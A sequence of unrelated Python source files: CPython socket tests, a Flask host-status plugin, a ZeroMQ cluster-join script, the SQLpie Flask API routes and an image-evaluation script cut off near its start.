self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(os_helper.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(os_helper.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
os_helper.unlink(os_helper.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = os_helper.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(os_helper.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(os_helper.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(TimeoutError, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# bpo-45212: the wait here needs to be longer than the client-side timeout (0.01s)
time.sleep(1)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(os_helper.TESTFN, encoding="utf-8") as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
class TestMacOSTCPFlags(unittest.TestCase):
def test_tcp_keepalive(self):
self.assertTrue(socket.TCP_KEEPALIVE)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
thread = threading.Thread(target=run, args=(sock, ))
thread.start()
self.addCleanup(thread.join, self.timeout)
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
def setUpModule():
thread_info = threading_helper.threading_setup()
unittest.addModuleCleanup(threading_helper.threading_cleanup, *thread_info)
if __name__ == "__main__":
unittest.main()
|
manager.py
|
import os
import sched
import threading
import time
from flask import current_app, request
from ..conf.config import Constant, HttpMethod
from ..exceptions import ErrorResponse
from ..exceptions.error_code import MsgCode
from ..exceptions.log_msg import ErrorMsg, InfoMsg
from ..models import model_init_app
from ..services import redis_conn
from ..services.host_status import query_flask_state_host, record_flask_state_host
from ..utils.auth import auth_method, auth_user
from ..utils.file_lock import Lock
from ..utils.format_conf import format_address, format_sec
from ..utils.logger import DefaultLogger, logger
from .response_methods import make_response_content
ONE_MINUTE_SECONDS = 60
def init_app(app, interval=Constant.DEFAULT_SECONDS, log_instance=None):
"""
Plugin entry
:param app: Flask app
:param interval: record interval
:param log_instance: custom logger object
"""
logger.set(log_instance or DefaultLogger().get())
app.add_url_rule('/v0/state/hoststatus', endpoint='state_host_status', view_func=query_flask_state,
methods=[HttpMethod.POST.value])
init_db(app)
init_redis(app)
model_init_app(app)
# Timing recorder
interval = format_sec(interval)
t = threading.Thread(target=record_timer, args=(app, interval,))
t.setDaemon(True)
t.start()
def init_redis(app):
redis_state = app.config.get('REDIS_CONF', {})
if not redis_state.get('REDIS_STATUS'):
return
redis_conf_keys = ['REDIS_HOST', 'REDIS_PORT', 'REDIS_PASSWORD']
redis_conf = {key: value for key, value in redis_state.items() if key in redis_conf_keys}
redis_conn.set_redis(redis_conf)
def init_db(app):
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
if not app.config.get('SQLALCHEMY_BINDS', {}).get(Constant.DEFAULT_BIND_SQLITE):
raise KeyError(ErrorMsg.LACK_SQLITE.get_msg())
app.config['SQLALCHEMY_BINDS'][Constant.DEFAULT_BIND_SQLITE] = format_address(
app.config['SQLALCHEMY_BINDS'].get(Constant.DEFAULT_BIND_SQLITE))
def record_timer(app, interval):
app.lock_flask_state = Lock.get_file_lock()
with app.app_context():
try:
current_app.lock_flask_state.acquire()
logger.info(InfoMsg.ACQUIRED_LOCK.get_msg('. process ID: %d' % os.getpid()))
s = sched.scheduler(time.time, time.sleep)
in_time = time.time()
target_time = int(int((time.time()) / ONE_MINUTE_SECONDS + 1) * ONE_MINUTE_SECONDS)
time.sleep(ONE_MINUTE_SECONDS - in_time % ONE_MINUTE_SECONDS)
record_flask_state_host(interval)
while True:
target_time += interval
now_time = time.time()
s.enter(target_time - now_time, 1, record_flask_state_host, (interval,))
s.run()
except BlockingIOError:
pass
except Exception as e:
current_app.lock_flask_state.release()
raise e
@auth_user
@auth_method
def query_flask_state():
"""
Query the local state and redis status
:return: flask response
"""
try:
b2d = request.json
if not isinstance(b2d, dict):
logger.warning(ErrorMsg.DATA_TYPE_ERROR).get_msg(
'.The target type is {}, not {}'.format(dict.__name__, type(b2d).__name__))
return make_response_content(ErrorResponse(MsgCode.JSON_FORMAT_ERROR))
time_quantum = b2d.get('timeQuantum')
return make_response_content(resp=query_flask_state_host(time_quantum))
except Exception as e:
logger.exception(e)
return make_response_content(ErrorResponse(MsgCode.UNKNOWN_ERROR), http_status=500)
|
node0.py
|
import zmq
import time
import threading
import json
name = 'bob'
def cluster_manager (context, join_uri):
nodes = [name]
join_sock = context.socket (zmq.REP)
join_sock.bind (join_uri)
while True:
message = join_sock.recv ()
req = json.loads (message)
if 'type' in req and req['type'] == 'JOIN' and req['node'] not in nodes:
nodes.append (req['node'])
resp = {'type': 'ACK', 'nodes': nodes}
join_sock.send (json.dumps(resp))
ctx = zmq.Context (1)
thread = threading.Thread (target = cluster_manager, args = (ctx, 'tcp://*:5560'))
thread.start ()
|
application.py
|
# -*- coding: utf-8 -*-
"""
SQLpie™ is a simple, sleek, intuitive, and powerful API platform for prototyping projects that have data intelligence needs.
SQLpie is 100% written in Python and sits on top of a MySQL database, which means that it's easy to maintain and most (if not all) of the data processing heavy lifting is done in SQL, a proven and somewhat scalable technology.
SQLpie License (MIT License)
Copyright (c) 2011-2016 André Lessa, http://sqlpie.com
See LICENSE file.
"""
from flask import Flask, request, jsonify, g, Response
from flask import current_app
from flask import render_template
from flaskext.mysql import MySQL
import json, threading, time, sys, traceback, os, logging, random
import sqlpie
application = Flask(__name__)
sqlpie_config = sqlpie.Config().load()
setup = sqlpie.DBSetup(sqlpie_config)
setup.init(application)
mysql = setup.db()
@application.before_request
def db_connect():
try:
g.conn = mysql.connect()
g.cursor = g.conn.cursor()
except:
pass
@application.teardown_request
def db_disconnect(response):
try:
g.cursor.close()
g.conn.close()
except:
pass
return response
#
# Routes
#
@application.route('/')
def index():
return 'Hello world, this is SQLpie.'
#
# Documents
#
@application.route("/document/<command>", methods=['POST'])
def document(command):
command = command.lower()
if command == "put":
resp = sqlpie.DocumentController.put(request)
elif command == "get":
resp = sqlpie.DocumentController.get(request)
elif command == "remove":
resp = sqlpie.DocumentController.remove(request)
elif command == "reset":
resp = sqlpie.DocumentController.reset(request)
else:
resp = Response(None, status=404, mimetype='application/json')
return resp
#
# Observations
#
@application.route("/observation/<command>", methods=['POST'])
def observation(command):
command = command.lower()
if command == "put":
resp = sqlpie.ObservationController.put(request)
elif command == "get":
resp = sqlpie.ObservationController.get(request)
elif command == "remove":
resp = sqlpie.ObservationController.remove(request)
elif command == "reset":
resp = sqlpie.ObservationController.reset(request)
else:
resp = Response(None, status=404, mimetype='application/json')
return resp
#
# Other
#
@application.route("/docs", methods=["GET"])
def docs():
return sqlpie.HealthController.docs(request)
@application.route("/stats", methods=["GET","POST"])
def stats():
return sqlpie.HealthController.stats(request)
@application.route("/ping", methods=["GET","POST"])
def ping():
return sqlpie.HealthController.ping(request)
#
# Search
#
@application.route("/service/index", methods=["POST"])
def service_index():
return sqlpie.SearchController.service_index(request)
@application.route("/service/search", methods=["POST"])
def service_search():
return sqlpie.SearchController.service_search(request)
#
# Classifier
#
@application.route("/service/classifier/init", methods=["POST"])
def service_classifier():
return sqlpie.ClassifierController.classifier_init(request)
@application.route("/service/classifier/train", methods=["POST"])
def service_classifier_train():
return sqlpie.ClassifierController.classifier_train(request)
@application.route("/service/classifier/clear", methods=["POST"])
def service_classifier_clear():
return sqlpie.ClassifierController.classifier_clear(request)
@application.route("/service/classifier/reset", methods=["POST"])
def service_classifier_reset():
return sqlpie.ClassifierController.classifier_reset(request)
@application.route("/service/classifier/predict", methods=["POST"])
def service_classifier_predict():
return sqlpie.ClassifierController.classifier_predict(request)
@application.route("/service/classifier/predictions", methods=["POST"])
def service_classifier_predictions():
return sqlpie.ClassifierController.classifier_predictions(request)
#
# Matching
#
@application.route("/service/matching/", methods=["POST"])
def service_matching():
return sqlpie.MatchingController.matching(request)
#
# Recommendation
#
@application.route("/service/collaborative/recommendation", methods=["POST"])
def service_recommend():
return sqlpie.CollaborativeController.service_recommend(request)
@application.route("/service/collaborative/similarity", methods=["POST"])
def service_similarity():
return sqlpie.CollaborativeController.service_similarity(request)
#
# Summarization
#
@application.route("/service/summarization", methods=["POST"])
def service_summarization():
return sqlpie.SummarizationController.service_summarization(request)
#
# Caching
#
@application.route("/caching/initialize", methods=["POST"])
def caching_initialize():
return sqlpie.CachingController.caching_initialize(request)
@application.route("/caching/add", methods=["POST"])
def caching_add():
return sqlpie.CachingController.caching_add(request)
@application.route("/caching/put", methods=["POST"])
def caching_put():
return sqlpie.CachingController.caching_put(request)
@application.route("/caching/get", methods=["POST"])
def caching_get():
return sqlpie.CachingController.caching_get(request)
@application.route("/caching/remove", methods=["POST"])
def caching_remove():
return sqlpie.CachingController.caching_remove(request)
@application.route("/caching/flush", methods=["POST"])
def caching_flush():
return sqlpie.CachingController.caching_flush(request)
@application.route("/caching/reset", methods=["POST"])
def caching_reset():
return sqlpie.CachingController.caching_reset(request)
@application.route("/caching/destroy", methods=["POST"])
def caching_destroy():
return sqlpie.CachingController.caching_destroy(request)
#
# Global Vars
#
if "options" in sqlpie_config:
options = sqlpie_config["options"]
sqlpie.global_cache[sqlpie.Config.OPTIONS] = sqlpie.Caching(sqlpie.Config.OPTIONS,1)
sqlpie.global_cache[sqlpie.Config.OPTIONS].put("options", options)
search_stopwords = sqlpie.Config.get(sqlpie.Config.SEARCH_STOPWORDS)
if search_stopwords is not None:
sqlpie.global_cache[sqlpie.Config.STOPWORDS] = sqlpie.Caching(sqlpie.Config.STOPWORDS,5000)
for stopword_file in search_stopwords:
words = sqlpie.Config.load_data(stopword_file)
for w in words:
sqlpie.global_cache[sqlpie.Config.STOPWORDS].add(w.strip())
#
# Background Threads
#
def handle_indexing(app, mysql):
with app.app_context():
while(True):
try:
g.conn = mysql.connect()
g.cursor = g.conn.cursor()
g.conn.begin()
# run indexing servie every 300 seconds
time.sleep(300)
sqlpie.Indexer().index_documents()
g.conn.commit()
except Exception as e:
if sqlpie.Util.is_debug():
traceback.print_tb(sys.exc_info()[2])
try:
g.conn.rollback()
except:
pass
finally:
# if the MySQL Server is not running, this will fail.
try:
g.cursor.close()
g.conn.close()
except:
pass
if sqlpie.DBSetup().environment() != "test":
if os.environ.get('WERKZEUG_RUN_MAIN') != 'true':
threads = []
if sqlpie.Config.get(sqlpie.Config.BACKGROUND_INDEXER) == True:
t = threading.Thread(name='handle_indexing', target=handle_indexing, args=(application, mysql))
t.setDaemon(True)
threads.append(t)
t.start()
# for t in threads:
# t.join()
if sqlpie.Util.is_debug():
application.debug=True
if __name__ == "__main__":
application.run(host="0.0.0.0", debug=sqlpie.Util.is_debug(), port=sqlpie.Config.get(sqlpie.Config.SERVER_PORT))
|
evaluation_matrix.py
|
import os
import pickle
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import glob
import torch
import scipy.misc
import numpy
import argparse
import cv2
from scipy import signal
from scipy import ndimage
from collections import OrderedDict
import multiprocessing
import math
from scipy.ndimage import gaussian_filter
from numpy.lib.stride_tricks import as_strided as ast
from skimage.measure import compare_ssim as ssim_f
from PIL import Image
import numpy as np
from skimage import feature
import math
from scipy.ndimage import correlate
import imutils
import dlib
from imutils import face_utils
import csv
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--sample_dir",
type=str,
default="/u/lchen63/lrw/test_result")
# default="/u/lchen63/grid/test_result")
parser.add_argument("--model_name",
type=str,
default="musk_r_lstm_newloss_row")
parser.add_argument("--pickle_path",
type = str,
default ='/u/lchen63/lrw/test_pickle/')
parser.add_argument("--num_thread",
type=int,
default=5)
return parser.parse_args()
def get_pickle(config):
